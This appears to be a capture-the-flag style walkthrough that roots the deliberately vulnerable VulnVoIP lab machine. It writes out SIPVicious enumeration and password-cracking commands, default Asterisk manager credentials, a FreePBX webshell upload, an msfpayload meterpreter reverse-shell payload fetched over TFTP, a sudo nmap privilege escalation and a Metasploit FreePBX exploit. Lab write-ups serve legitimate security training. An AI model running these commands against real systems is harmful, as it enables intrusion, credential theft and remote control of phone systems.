VulnVoIP (Vulnerable VoIP) SolutionsAs promised here we shall discuss a couple of ways to get root on VulnVoIP with some enumeration funin-between!Assumingyouvelocated the IP address, you can run a port scan and will find the following services listening (shortened for easy reference): 22/tcp open 53/tcp open domain 80/tcp open http 111/tcp open rpcbind 967/tcp open 3306/tcp open mysql 4445/tcp open 5038/tcp open asteriskVoIP User EnumerationIn this demonstration Im usingSIPViciousto enumerate the SIP device/users and to help crack extension passwords.The first thing to do is enumerate the end device. To do so we can use the command./svmap.py fingerprint 192.168.237.148

The next step is to locate valid SIP extensions. The initial command I used was./svwar.py -D 192.168.237.148

As you can see no valid extensions are returned.Its possible to specify the method used in the request. In this particular instance the INVITE request brings back valid responses./svwar.py -D -m INVITE 192.168.237.148

If all went well you should find that 6 extensions exist. The D option used in the previous command just searches for default extensions, so its generally best to use a custom range. I also found that if I specified the extensions to scan, i.e. e100-3000, only the lower extensions were found, hence it may be best to split up long scans.Now that wevelocated extensions we really want to crack the associated passwords. Again SIPVicious can be used to perform this attack by using a command such as./svcrack.py -u2000 -d passwords.txt 192.168.237.148

You might find that some extensions are easy to crack, others are a bit more testing! In this particular case, luckily, we have another unusual method of obtaining extension passwords.Referring back to the port scan you can see that TCP port 5038 (Asterisk Call Manager) is open and available to external probes! If you performed a vulnerability scan this may have shown up stating that default credentials are in place.It is possible to connect to the service using the telnet protocol on port 5038 with the default username admin and password amp111.

Using the command action with the actual command ofsip showusersit is possible to pull out a complete list of users, shown below:

The acm interface can also be used to locate voicemail users (useful for the next exercise!)

Note the interesting information highlighted in the above image.A thorough list of acm commands can be foundhereFurther ExploitationAswevelocated a single user with voicemail capability, and we have the extension password, it is possible to use a soft-phone to log in with the credentials and attempt to gain access to the users voicemail inbox. For this particular exampleImusingX-Lite.

Referencing Asterisk documentation its possible to see that*97can be used to obtain voicemail. As we dont know the voicemail password were going to have to bruteforce the manual way! Hint 0000 may get you in In case youre still struggling thevoicemailgoes along the lines of the following:Hey Mark, I think the support web access account has been compromised. I have changed the password to securesupport123 all one word and lowercase. You can log on at theusualaddress. See you in the morningAfter listening to the voicemail you should now have the username and password for the support account. To test these out navigate to the HTTP interface and enter the credentials support/securesupport123

Upon login youll be presented with the main administrative interface. A key piece of info is found in the FreePBX version details (research for vulnerabilities).One particular vulnerability of interest can be foundhere, of which an extract follows:1. Create a directory such as: webshell2. Create a PHP file webshell, i.e. webshell.php Example.:3. Put this file into the webshell directory and create a tarball. This compressed file name needs to follow the given rule, i.e. name-version.tgz. The following command can be used to compress: tar -czvf webshell-1.0.tgz webshell/.4. Upload via the FreePBX modules interface

Using the webshell to perform a basic command (to ensure all is working as expected).

I used msfpayload to create a reverse shell for ease of access.msfpayload linux/x86/meterpreter/reverse_tcp LHOST=192.168.237.129 LPORT=4448 X > /root/vulnvoip/rev_shell.

The handler (exploit/multi/handler) was used to listen and wait for incoming connections.TFTP can be used to upload the binary to the host using the PHP webshell as previously created, by using the commandtftp *HOST_IP*-c get rev_shell.Permissions of the uploaded file will need to be altered, i.e.chmod 777 rev_shell -not a great idea to use lax permissions like these in real lifeUpon gaining access via the Meterpreter shell it makes things easier (continue reading)Local Privilege EscalationThe usual tips and tricks work here. A littlesurpriseis hidden in the sudoers file. Firstly well need to locate the current user byissuingthe commandidwhich will show the user is asterisk. Issuing the commandsudo -lwill then identify the commands that asterisk can run as root.

The user asterisk cansurprisinglyrun nmap as root! Theres a little trick here

Weve got root!Exploitation The Easy Way!The following was covered in detail by Offensive Security and the write-up can be foundhere.The version of FreePBX in use is vulnerable to anarbitraryremote code execution issue. Further details can be found atexploitDBandSecurityfocus.From the reported details it ispossibleto see that a Metasploit moduleexists, this beingexploit/unix/http/freepbx_callmenum.

Set the relevant options (note, the extension we use for this either has to go to voicemail or the call needs to be answered). For this exploit were going to use the support extension. Well assume that we havent yet cracked user credentials to any extensions and, this being the only one with voicemail, leaves us with just one choice.Exploit!

We have root shell. Now how cool and easy was that!

There are a few more funky things we can do with VulnVoIP, such as SIP spoofing. However well cover that in aseparatepost and in the meantime have some fun!